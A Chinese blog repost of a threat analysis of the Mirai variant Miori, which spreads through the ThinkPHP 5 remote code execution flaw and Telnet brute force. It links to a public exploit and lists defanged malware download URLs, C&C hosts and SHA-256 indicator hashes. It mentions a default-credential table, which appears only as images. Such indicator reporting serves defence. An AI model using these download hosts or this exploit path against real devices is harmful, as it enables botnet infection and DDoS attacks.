IoT僵尸网络Miori通过ThinkPHP远程代码执行漏洞进行传播

最新推荐文章于 2023-02-07 10:59:25 发布
最新推荐文章于 2023-02-07 10:59:25 发布
阅读量983 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackorbird/article/details/102462366
版权

转发开心,送你们一些IOT默认凭据表

640?wx_fmt=png

Mirai变种“Miori”出现,通过Thinkphp5远程代码执行(RCE)漏洞传播

漏洞详细分析:

Thinkphp5 远程代码执行漏洞事件分析报告

https://paper.seebug.org/770/

exp:

https://www.exploit-db.com/exploits/45978

Mirai,太有名了,自己百度去。

现在出现了一种名为"Miori"的Mirai变种,其特点在于利用了新漏洞进行传播。

除了Miori之外,安全研究员还发现了几种已知的Mirai变种,如IZ1H9和APEP,使用相同的RCE漏洞来获取它们的到达方法。上述变种都通过Telnet使用出厂默认凭证来强制进入并传播到其他设备。一旦这些Mirai变种中的任何一个感染Linux机器,它将成为僵尸网络的一部分,从而促进分布式拒绝服务(DDoS)攻击。

Miori只是众多Mirai分支中的一个,和一种称为Shinoa的变种有惊人的相似之处

(https://www.fortinet.com/blog/threat-research/shinoa--owari--mirai--what-s-with-all-the-anime-references-.html)。

分析显示,Miori背后的网络犯罪分子使用Thinkpad RCE使易受攻击的机器从hxxp下载并执行他们的恶意软件:hxxp://144[.]202[.]49[.]126/php

640?wx_fmt=png

执行后,Miori恶意软件将在控制台中生成

640?wx_fmt=png

它将启动Telnet以强制其他IP地址。它还从端口42352(TCP / UDP)侦听来自其C&C服务器的命令。然后发送命令“/bin/busybox MIORI”以验证目标系统的是否感染。

640?wx_fmt=png

通过解密嵌入在其二进制文件中的Miori恶意软件配置表,可以找到以下值得注意的字符串。

下面列出恶意软件使用的用户名和密码,其中一些是默认的。

Mirai变种:Miori

640?wx_fmt=png

仔细观察还发现了两个其他Mirai变种使用的两个URL:IZ1H9和APEP。

位于两个URL中的二进制文件(x86版本)。

两种变种都使用与Mirai和Miori相同的字符串反混淆技术,同样能够解密其配置表。

hxxp://94[.]177[.]226[.]227/bins/

Mirai 变种: IZ1H9

640?wx_fmt=png

hxxp://cnc[.]arm7plz[.]xyz/bins/

640?wx_fmt=png

值得注意的是,除了通过Telnet进行暴力破解之外,APEP还利用CVE-2017-17215进行传播

(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215)

其中涉及另一个RCE漏洞并影响华为HG532路由器设备的攻击。据报道,该漏洞还涉及Satori和Brickerbot变种

(https://securityaffairs.co/wordpress/67227/malware/cve-2017-17215-exploit-code.html)。

华为此后发布了安全通知,并概述了规避可能的利用的措施。

(https://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en)

今日各类情报可以关注公众号后看菜单栏的知识星球处扫码进入观看。

640?wx_fmt=jpeg

微信最新版本,值得一用

ioc:

SHA-256

ee9c7a5b9f7059bdd0649eaaa0adb762683c79fbda91746048332813b44fa1e2

0d3a8933735a8d19c234db8a5ba1a0c2de390ae59b7298494a4e3bf139851d5f

a6956f98deec26bdaed948cd36ef6bfe954dbba227fd66ad3babd3a7fa4b4d96

239c9aeec6e17a2739c12b7a4821b99be53375b085210a14d2f4f3e362dd3b7c

adb8271ed2342f50fd602353251574504672992db45fdde7e1e9a223cbd9a10a

868a582cd87418faac09859527b1b9405b287799429c424552551a5a3ddfe1b3

25a5415a04ff746d0cfa4f5e82b00d7aaac60e92424dd94bb8cf9626e6b724ef

f271d7a3290581f552376cf00006b961fcf54b0d9aa1365c4550113a1132f32d

bd188c69264362b8a09d14af6196b83a6c3da5d6d3b6dc95b97fe87108500c91

c5e79ceb1878ad4aebf3e8a33a66aeed535aecc1e5ebca0dd0122a6ecfbfe207

e51c2675430ebb1e49b4187508eae926fdfc52560074a23f937fe50c72c3d56d

76049e93887525e097c9fd06bdc31dad6a118082f5b2fc581020ae11ad80be95

119c33956bb26fdb697b2e042cde106c98cb1562fdbd5bb2acb2d8e7e603a303

4825e628d3d6442870821823c14bac5bcab93658e3dbf426b8e6c479320077a9

4dfab085dcc8d1a4ea6be2f6ca08970d238ffcd4b9ee0728d1f38070750e5f7b

937df675fba3e58e41514ec1881bd9298043533ca9e113b91240d916761fa704

d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e

1b20bedd8a69695ba30a4284c19fe84e5926ed8de4f9074b4137ee07e6674d77

37b6a3b2ca8681abfcaa79868963046aeaab8a46e123d5311d432bd9d11fcc80

19eb54eea5dfd71d5753ed94e1845fa81b88545f47c14a2c90960da8e06e6c1b

ec77dcab385c31bbbf228df92dcaecc947279c3143afc478807184395b06a6e6

83619527ba2e4c20d1eb5206f058ca55358b4b3ac032ee8d22616a020c8853d0

27f6c7ce88d874a270d197bb91d419783bf5e08e16fa43ced57607748f2fc5b2

404ea2a77693b0ab4c76da65aae7451d83d621a75b8eb8d2736998bf1c23ecf3

64e1f581d42f2c9e0c1f13b4f814d4a4b0cad2e3ac1c8a754f6a912ab07b4bc1

231d0913bba4b8c02f93fca2a917762eb94013d31f0ac4c9703b498b6ab9a87f

bf3190c7746775a7756d76d0c4bbeedeb1b4bc2a14fb3465da0bd49dfae14503

eba3e81fcedaaa9661c5faa41b98c1d7906fdad7f960530f936ac2ad0b921ac3

ad463ae6c08a085a1c45fc8da32c736bb1ced083d0cc0619a7d0a919c43a3717

eefa90ebde0d5d16c71315f292f86a72735e62af686a7872d1d153694582404d

7408a894f4c278155b5ab28ebd48269075ee73ad24dc877cecd7b41a97b6d975

282836e3d6649d9f97cdbf6b373329386a4fd290b87599f84f1d84ecfe5586eb

73036a31742e52cca9cfb02883cef62efb7f9129c14e2e2fd3064d2b4b8ec6e0

Related malicious URLs:

hxxp://144[.]202[.]49[.]126/miori[.]mips

hxxp://144[.]202[.]49[.]126/miori[.]mpsl

hxxp://144[.]202[.]49[.]126/miori[.]arm

hxxp://144[.]202[.]49[.]126/miori[.]arm5

hxxp://144[.]202[.]49[.]126/miori[.]arm6

hxxp://144[.]202[.]49[.]126/miori[.]arm7

hxxp://144[.]202[.]49[.]126/miori[.]sh4

hxxp://144[.]202[.]49[.]126/miori[.]ppc

hxxp://144[.]202[.]49[.]126/miori[.]x86

hxxp://144[.]202[.]49[.]126/miori[.]arc

hxxp://144[.]202[.]49[.]126/php

hxxp://94[.]177[.]226[.]227/bins/

hxxp://cnc[.]arm7plz[.]xyz/bins/

hxxp://scan[.]arm7plz[.]xyz

blackorbird
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php启动element,GitHub - waniot/thinkphp5.1-vue-element-admin
weixin_35740545的博客
03-23 488
thinkphp5.1-vue-element-admin介绍基于thinkphp5.1、vue、element做的一个后台管理系统,默认打包出的是异步加载还有一点需要注意的是,如果使用本项目的ThinkPHP5.1进行接口开发,值得注意的一点是,我已经封装好接管异常的处理了,只需要创建异常类文件继承封装的异常就可以了。异常目录 app/lib/excption 目录,这个异常类分两种,一种是客户...
基于Thinkphp的通用后台系统
08-26
基于Thinkphp的通用后台系统
ThinkPHP5物联网设备管理系统
专注PHP源码
10-16 2844
此物联网设备管理系统基于ThinkPHP5开发,数据库mysql,前端HTML/CSS、JavaScript、jQuery、AJAX、X-admin、Layui。同时具有BAP(业务分析平台)和BMP(设备管理平台)的部分功能。源码注释很详细。
thinkphp6.0 阿里云 stomp
xingzixhh110的博客
05-13 828
前置条件 thinkadmin ThinkAdmin: 基于 ThinkPHP 微信后台管理平台(体验账号和密码都是 admin)https://gitee.com/zoujingli/ThinkAdmin 实现效果: // 开启 php think xapi:CmdAliyunStomp start //守卫进程 php think xapi:CmdAliyunStomp start -d // 关闭 php think xapi:CmdAliyunStomp stop //状态 php
在华为云服务器上搭建OTA服务器之thinkphp5
学无止境,静下心来!
11-03 1349
因为用的云服务器是ubuntu裸机,所以软件都需要自己安装。 这个过程遇到很多问题花费了好多时间,也好,就当学习了。 1. FTP上传失败问题???     前面通过ftp客户端已经可以连上云服务器了,但是上传文件失败!!!     最后发现居然是云服务器ftp 主目录是用root 权限创建的,所以用ftp的用户名从ftp客户端连接当然就无法上传了。     哎,到处是陷阱,细心
IOT 僵尸网络严重威胁网络基础设施安全1
08-04
治因素背景,涉及到IoT(InternetofThings,物联网)设备安全等多种因素,在表象的DDoS攻击和DNS安全之外,依然有很多值得关注和研究的问题。事
信息安全_1.大漏洞时代下的僵尸网络追踪v2.2.pptx
08-14
- **漏洞利用**:僵尸网络还利用软件漏洞进行传播,如Struts 2远程代码执行漏洞和MS17010(永恒之蓝)漏洞,后者被用来下载DDoS木马。 - **IoT设备后门**:物联网设备由于安全防护较弱,往往成为僵尸网络的入口,...
NB-IoT无线网络系统优化指导书.docx
12-08
《NB-IoT无线网络系统优化指导书》是中国电信福建分公司提供的一份详细的技术文档,旨在指导网络工程师对NB-IoT(窄带物联网)无线网络进行系统优化,以提升网络性能和服务质量。该指导书涵盖了多个方面,包括网络...
基于NB-IoT的工业设备报警实时远程监控系统设计
01-12
为了满足工业实时监控、低成本和低功耗等多方面的需求,本文设计并实现了基于NB-IoT数据传输技术的工业设备报警实时远程监控系统。该系统基于NB-IoT通信方式,选用STM32主控芯片为核心的硬件监控装置,以OneNET平台...
NB-IoT网络架构
01-27
NB-IoT端到端系统架构如下图所示: 终端:UE(UserEquipment),通过空口连接到基站(eNodeB(evolvedNode ...主要承担空口接入处理,小区管理等相关功能,并通过S1-lite接口与IoT核心网进行连接,将
蠕虫木马Mirai
最新发布
m0_49025459的博客
02-07 1931
概述概述Mirai病毒是物联网病毒的鼻祖,能够感染在 ARC 处理器上运行的智能设备,将其转变为远程控制的机器人或“僵尸”并组成网络。这种机器人网络称为僵尸网络,通常用于发动 DDoS 攻击。由于Mirai病毒具备了所有僵尸网络病毒的基本功能(爆破、C&C连接、DDoS攻击),后来的许多物联网病毒都是基于Mirai源码进行更改的。攻击流程Mirai 扫描互联网上运行于 ARC 处理器上的 IoT 设备。这种处理器运行 Linux 操作系统的精简版本。
Unix.Trojan.DDoS_XOR-1木马症状及…
背锅侠
10-19 1331
问题原因 数字校园应用的REDIS缓存系统存在BUG,致使服务器被注入了入侵者自己生成的公匙,并上传到了Redis的DATA目录,最终获取了服务器的root权限   影响范围 数字校园采用的Redis版本存在bug,影响所有部署的数字校园服务器,需全部更新   处理过程-修复REDIS 1、更新REDIS版本 2、修改配置文件,使用"bind 127.0.0.1"指令将REDIS限制侦听本地接
网络安全学习笔记之Mirai僵尸网络
dzcera的博客
01-28 1万+
最近在学习人工智能防治物联网设备的ddos攻击有关项目时接触到目前主流的IoT攻击模式,其中就包括Mirai僵尸网络。学习了《Understanding the Mirai Botnet》一文,原文链接如下 https://xueshu.baidu.com/usercenter/paper/show?paperid=ef4bd68424819b095fa8837b5fe58049 僵尸网络是互联网上的黑空集中控制一群计算机,是一种大规模的网络攻击方式。包括分布式拒绝服务攻击、海量垃圾邮件攻击等,对网络的安全
僵尸网络的工作原理与防御
热门推荐
wei.zhou的专栏
09-05 2万+
一、Botnet的起源与定义   起源及演化过程   Botnet是随着自动智能程序的应用而逐渐发展起来的。在早期的 IRC聊天网络中,有一些服务是重复出现的,如防止频道被滥用、管理权限、记录频道事件等一系列功能都可以由管理者编写的智能程序所完成。于是在1993 年,在IRC 聊天网络中出现了Bot工具——Eggdrop,这是第一个Bot程序,能够帮助用户方便地使用IRC 聊天网络。这种bot
基于thinkphp5框架搭建OAuth2.0服务端
weixin_48407519的博客
08-18 1064
OAuth是用于服务端与客户端授权登录的协议,OAuth2.0是OAuth的第二个版本,关于OAuth2.0的基础知识,可以阅读阮一峰的一篇博文,对OAuth2.0的介绍非常详细,只要理解了OAuth2.0的授权过程,在自己网站实现OAuth2.0并不复杂。 本文将讲解如何基于thinkphp5.1的框架实现OAuth2.0的服务端。 1 环境搭建 首先确保你已经搭建好了服务器,并且已经能够正常访问你的服务器。我的环境Xampp+thinkphp5.1. 2 安装OAuth2.0 php包 你页根据OAut
揭秘Neutrino僵尸网络生成器
weixin_33700350的博客
03-08 651
mssp299 · 2015/08/24 10:17翻译:mssp299原文地址:blog.malwarebytes.org/botnets/201…0x01 引言一般情况下,网络犯罪分子通常都会以产品套装的形式来出售其攻击软件,其中包括:恶意有效载荷:恶意软件的前端,用于感染用户。C&C面板:恶意软件的后端部分,通常为LAMP环境下的一个Web应用程序。生成器:一个应用程序,用来打包有效...
thinkphp漏洞_利用Thinkphp漏洞传播的Mirari新变种分析
weixin_39927144的博客
12-10 187
一、概述12月底,通过安全设备检测到几个不同的IP试图对几个公司内部的网站进行漏洞攻击。通过攻击日志发现攻击IP使用了于2018年12月12日爆出的ThinkPHP远程代码执行漏洞(CNVD-2018-24942),攻击者利用该漏洞,可在未授权的情况下远程执行代码。下图为攻击日志:攻击者试图在被攻击服务器上执行如下命令:‘Cd /tmp;wget http://cnc.junoland....
Mirai僵尸网络
zheng_zmy的博客
06-15 5943
《Understanding the Mirai Botnet》选择这篇论文是想了解一下物联网设备现如今面临的安全威胁,这篇文章选题是在当时对美国等多个国家的其由于在2016年导致美国大范围网络瘫痪而名噪一时的Mirai僵尸网络,这篇论文对于Mirai僵尸网络进行了完整的分析。但是这是一篇实验记录的文章,主要讲了他们对Mirai的哪些方面做了研究,收集了什么样本,怎么做的实验,得出什么结果,对于想了解Mirai的读者我不怎么友好。因此我结合了一些网上搜集的相关文章来简单介绍一下Mirai以及蜜罐。 僵尸网络
PHP僵尸网络,什么是僵尸网络
weixin_34828705的博客
03-28 123
什么是僵尸网络僵尸网络由诸如智能手机或物联网设备的众多联网设备组成,每个设备包含一个或多个僵尸程序。僵尸网络所有者使用命令和控制 (C&C) 软件来操控网络执行各种需要大规模自动化的(恶意)行动。其中包含:分布式拒绝服务 (DDoS) 攻击会造成应用程序意外假死核实泄露凭据清单(凭据填充攻击)会导致账户接管发动 Web 应用程序攻击,盗取数据提供给攻击者设备访问权限及网络连接请注意,网...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值